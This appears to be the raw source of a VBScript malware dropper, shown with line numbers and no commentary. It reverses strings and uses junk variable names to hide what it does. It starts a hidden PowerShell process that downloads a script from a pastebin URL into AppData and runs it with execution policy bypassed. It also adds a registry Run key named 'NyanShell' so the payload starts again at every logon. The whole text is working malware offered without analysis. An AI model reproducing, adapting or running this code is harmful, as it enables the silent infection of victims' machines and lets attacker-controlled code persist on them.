startupfolder="C:\Users\"+CreateObject(rev("krowteN.tpircSW")).UserName+"\AppD

1.  
2. startupfolder="C:\Users\"+CreateObject(rev("krowteN.tpircSW")).UserName+"\AppData\Roaming\VHF.ps1"
3.  
4.  
5.  
6.  
7.  
8.  
9.  
10.  
11. gshjgjshsjhsusyuiweiwuwiuwiuiww = "Powershell $r='KEX'.replace('K','I'); sal D $r;'(&(GCM'+' *W-O*)'+ 'Net.'+'Web'+'Cli'+'ent)'+'.Dow'+'nl'+'oad'+'Fil'+'e(''https://pastebin.com/raw/1it5wZYJ'',$env:APPDATA+''\\''+''VHF.ps1'')'|D|D"
12. Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
13.  
14. Set yeteuyeuehjehejehjehejenhjehejhejhejehje = objWMIService.Get("Win32_ProcessStartup")
15. Set objConfig = yeteuyeuehjehejehjehejenhjehejhejhejehje.SpawnInstance_
16. objConfig.ShowWindow = 0
17.  
18. Set objProcess = objWMIService.Get("Win32_Process")
19. intReturn = objProcess.Create(gshjgjshsjhsusyuiweiwuwiuwiuiww, Null, objConfig, intProcessID)
20.  
21. Set objShell = CreateObject("Wscript.shell")
22. objShell.run("powershell -executionpolicy bypass -noprofile -windowstyle hidden -noexit -file " + startupfolder)
23. Set WshShell = CreateObject("WScript.Shell")
24. WshShell.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\NyanShell","C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden -noexit -file " + startupfolder,"REG_SZ"
25.  
26.  
27. Function rev(Str)
28. dsd="f"
29. ggh="gr"
30.  
31. If dsd = ddg Then
32.  
33.  
34.  
35. else
36.  
37. For i = Len(Str) To 1 Step -1
38. Var = Mid(Str, i, 1)
39. reverseString = reverseString & Var
40. Next
41. rev = reverseString
42.  
43. End if
44. End Function